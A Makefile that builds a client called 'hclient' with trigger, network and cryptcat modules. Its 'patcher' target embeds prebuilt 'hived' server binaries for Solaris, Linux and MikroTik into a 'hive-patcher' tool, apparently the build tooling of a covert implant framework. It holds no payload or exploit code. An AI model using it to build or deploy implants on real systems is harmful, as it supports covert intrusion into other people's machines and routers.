# Defaults
CFLAGS	= -Wall -W -Wdeclaration-after-statement
#CFLAGS += -Wall -Wextra -Os -ansi -std=gnu99
OFLAGS	= -O2

ifeq ("$(TARGET)", "linux-x86")
  include Makefile-include.linux-x86
else ifeq ("$(TARGET)", "linux-x86_64")
  include Makefile-include.linux-x86_64
endif

CC = gcc
GCCVERSION_GT_4.6 = $(shell expr `gcc -dumpversion | cut -f1,2 -d.` \>= 4.6)

BINARY = hclient-$(TARGET)

COMMON = ../common
CRYPTO = $(COMMON)/crypto
SSL = $(COMMON)/ssl/library
INCLUDES = -I$(SSL)/../include -I$(CRYPTO) -I../common
LIBSSL = $(SSL)/libpolarssl.a
LIBCRYPTO = $(CRYPTO)/libcrypto.a

.PHONY: force-rebuild
ifdef ARCH_BUILD_CRYPTO
  ifneq ("$(ARCH_BUILD_CRYPTO)", "$(TARGET)")
    CRYPTO_REBUILD:=force-rebuild
  else
    CRYPTO_REBUILD:=
  endif
else
  CRYPTO_REBUILD:=force-rebuild
endif

ifdef ARCH_BUILD_SSL
  ifneq ("$(ARCH_BUILD_SSL)", "$(TARGET)")
    SSL_REBUILD:=force-rebuild
  else
    SSL_REBUILD:=
  endif
else
  SSL_REBUILD:=force-rebuild
endif

LDFLAGS = -lpthread


ifeq "$(GCCVERSION_GT_4.6)" "1"
	CFLAGS += -Wno-unused-result
endif

CFLAGS += $(INCLUDES)

ifdef DEBUG
  CFLAGS += -g
  CFLAGS += -DPOLARSSL_DEBUG_C -DPOLARSSL_DEBUG_MSG -DDEBUG -D_DEBUG
endif

CRYPTCAT = -DLINUX cryptcat/netcat.c
#CRYPTCAT = -DLINUX -lstdc++ cryptcat/farm9crypt.cc cryptcat/twofish.cc cryptcat/netcat.c
LIBFILES = trigger_utils.c trigger_network.c trigger_protocols.c
#LIBFILES += string_utils.o init_strings.o init_crypto_strings.o $(LIBPOLARSSL)-I../.. -I../include -Wall -W -Wdeclaration-after-statement

OBJS =	main.o functions.o misc.o modes.o parser.o \
	trigger.o trigger_network.o \
	trigger_protocols.o b64.o trigger_utils.o threads.o \
	string_utils.o init_strings.o

LIBS = $(LIBCRYPTO) $(LIBSSL) $(LIBCRYPTO)

UNPATCHED_SOLARIS_SPARC = hived-solaris-sparc-unpatched
UNPATCHED_SOLARIS_X86 = hived-solaris-x86-unpatched
UNPATCHED_LINUX_X86 = hived-linux-x86-unpatched
UNPATCHED_MIKROTIK_X86 = hived-mikrotik-x86-unpatched
UNPATCHED_MIKROTIK_MIPSBE = hived-mikrotik-mips-unpatched
UNPATCHED_MIKROTIK_MIPSLE = hived-mikrotik-mipsel-unpatched
UNPATCHED_MIKROTIK_PPC = hived-mikrotik-ppc-unpatched

UNPATCHED_BINS = $(UNPATCHED_SOLARIS_SPARC) $(UNPATCHED_LINUX_X86)
UNPATCHED_BINS += $(UNPATCHED_SOLARIS_X86) $(UNPATCHED_MIKROTIK_X86) $(UNPATCHED_MIKROTIK_MIPS)
UNPATCHED_BINS += $(UNPATCHED_MIKROTIK_PPC) $(UNPATCHED_MIKROTIK_MIPSEL)

$(info =========================================================================)
$(info .  TARGET: $(TARGET))
$(info .  SRCDIR: $(PWD))
$(info .      CC: $(CC))
$(info .  CFLAGS: $(CFLAGS))
$(info . LDFLAGS: $(LDFLAGS))
$(info =========================================================================)
$(info )
$(info )

.SILENT:

.PHONY: all
all: $(LIBSSL) hclient debug

.PHONY: release
release: hclient

.PHONY: hclient
hclient: init_strings.o $(LIBSSL) $(LIBCRYPTO) $(OBJS)
	${CC} ${CFLAGS} -o ${BINARY} ${OBJS} $(LIBS) ${LDFLAGS} 
	strip ${BINARY}
	md5sum ${BINARY} > ${BINARY}.md5
	echo "ARCH_BUILD_CLIENT=$(TARGET)" > ARCH_BUILD

$(LIBSSL): $(SSL_REBUILD)
	cd $(SSL) && $(MAKE) TARGET=$(TARGET)

$(LIBCRYPTO): $(CRYPTO_REBUILD)
	cd $(CRYPTO) && $(MAKE) TARGET=$(TARGET)


.PHONY: debug
debug: strings $(LIBSSL) $(LIBCRYPTO) 
	${CC} -o ${BINARY}-dbg ${OBJS} $(LIBS) ${LDFLAGS} 
	md5sum ${BINARY}-dbg > ${BINARY}-dbg.md5

#library: $(LIBPOLARSSL) strings
library: strings
	gcc $(CFLAGS) -c $(LIBFILES)
	ar rv libhclient.a *.o
	ranlib libhclient.a
	echo "ARCH_BUILD_CLIENTLIB=$(TARGET)" > ARCH_BUILD
	printf "=========================================================================\n"
	printf "\tBUILDING CLIENT COMPLETE\n"
	printf "=========================================================================\n"

libcryptcat: cryptcat/farm9crypt.o cryptcat/twofish2.o
	gcc -c $(CRYPTCAT) 
	ar rv libcryptcat.a netcat.o farm9crypt.o twofish2.o
	ranlib libcryptcat.a

cryptcat/farm9crypt.o: cryptcat/farm9crypt.cc cryptcat/farm9crypt.h
	gcc -c cryptcat/farm9crypt.cc

cryptcat/twofish2.o: cryptcat/twofish2.cc cryptcat/twofish2.h
	gcc -c cryptcat/twofish2.cc

.PHONY: strings
strings: init_strings.o string_utils.o 

#init_crypto_strings.o: init_crypto_strings.c string_utils.o 

#init_crypto_strings.c: crypto_strings.txt string_utils.o
#	python mod_gen_cryptostring_header.py crypto_strings.txt CRYPTO_STRINGS

init_strings.o: init_strings.c string_utils.o
	${CC} ${CFLAGS} -c init_strings.c

init_strings.c: client_strings.txt string_utils.h
	python mod_gen_string_header.py client_strings.txt CLIENT_STRINGS

string_utils.o: string_utils.c string_utils.h
	${CC} ${CFLAGS} -c string_utils.c string_utils.h

.PHONY: patcher
patcher: $(UNPATCHED_BINS) $(LIBSSL) 
	printf "\n Latest, unpatched builds of binaries must be\n"
	printf "  present with the following naming conventions:\n"
	printf "  . hived-solaris-sparc-unpatched\n"
	printf "  . hived-solaris-i386-unpatched\n"
	printf "  . hived-linux-i386-unpatched\n"
	printf "  . hived-mikrotik-i386-unpatched\n"
	printf "  . hived-mikrotik-mipsbe-unpatched\n"
	printf "  . hived-mikrotik-mipsle-unpatched\n"
	printf "  . hived-mikrotik-ppc-unpatched\n\n"
	xxd -i $(UNPATCHED_LINUX_X86) _unpatched_linux_x86.h
	xxd -i $(UNPATCHED_MIKROTIK_X86) _unpatched_mikrotik_x86.h
	xxd -i $(UNPATCHED_MIKROTIK_MIPS) _unpatched_mikrotik_mips.h
	xxd -i $(UNPATCHED_MIKROTIK_MIPSEL) _unpatched_mikrotik_mipsel.h
	xxd -i $(UNPATCHED_MIKROTIK_PPC) _unpatched_mikrotik_ppc.h
	xxd -i $(UNPATCHED_SOLARIS_X86) _unpatched_solaris_x86.h
	xxd -i $(UNPATCHED_SOLARIS_SPARC) _unpatched_solaris_sparc.h
	gcc -m32 -Os -W -Wall -I. -I$(SSL)/include string_utils.c patcher.c -o hive-patcher $(LIBSSL)
	strip hive-patcher
	md5sum hive-patcher > hive-patcher.md5

.PHONY: distclean
distclean: clean
	printf "\tDIST CLEANING:\t$(CURDIR)\n"
	rm -f ${BINARY}*
	rm -f hive-patcher hive-patcher.md5 *PATCHED

.PHONY: clean
clean:
	printf "\tCLEANING:\t$(CURDIR)\n"
	rm -f $(OBJS)
	rm -f *.a init_strings.c core cryptcat/*.o cryptcat/cryptcat
#	rm -f _unpatched_solaris_sparc.h _unpatched_windows_i386.h _unpatched_linux_i386.h
	rm -f _unpatched_*.h
	rm -f *UNpatched*
	rm -f init_strings.*
	rm -f init_crypto_strings.*
	rm -f string_utils.o
	rm -f crypto_strings_main.h
	rm -f string_utils.h.*
	rm -f crypto_proj_strings.h
	rm -f mod_hexify.pyc
	rm -f proj_strings_main.h
	rm -f proj_strings.h
	make -C $(SSL) clean

.c.o:
	printf "\tCC\t$<\n"
	$(CC) $(CFLAGS) $(OFLAGS) -c $<

